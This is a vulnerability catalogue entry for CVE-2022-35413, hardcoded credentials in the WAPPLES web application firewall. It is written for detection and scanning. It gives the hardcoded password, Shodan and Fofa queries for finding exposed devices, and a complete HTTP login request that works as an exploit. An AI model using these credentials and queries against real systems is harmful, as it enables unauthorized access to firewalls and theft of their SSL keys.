🔙 목록으로 돌아가기

CVE-2022-35413: WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials

TitleWAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials
AuthorFor3stCo1d
SeverityCritical
ImpactAn attacker can exploit this vulnerability to gain unauthorized access to the WAPPLES Web Application Firewall.
RemediationUpgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability.
CVSS Score9.8
EPSS Score0.85969
CVE IDCVE-2022-35413
CWE IDCWE-798
Shodan Queryhttp.title:"Intelligent WAPPLES"http.title:"intelligent wapples"
Fofa Querytitle="intelligent wapples"
Tags cve cve2022 wapples firewall default-login pentasecurity vkev vuln

🔍 Vulnerability Description

WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001.

🌐 HTTP Request

POST /webapi/auth HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Content-Length: 29
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

id=systemi&password=db/wp.no1

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-35413.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-35413.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A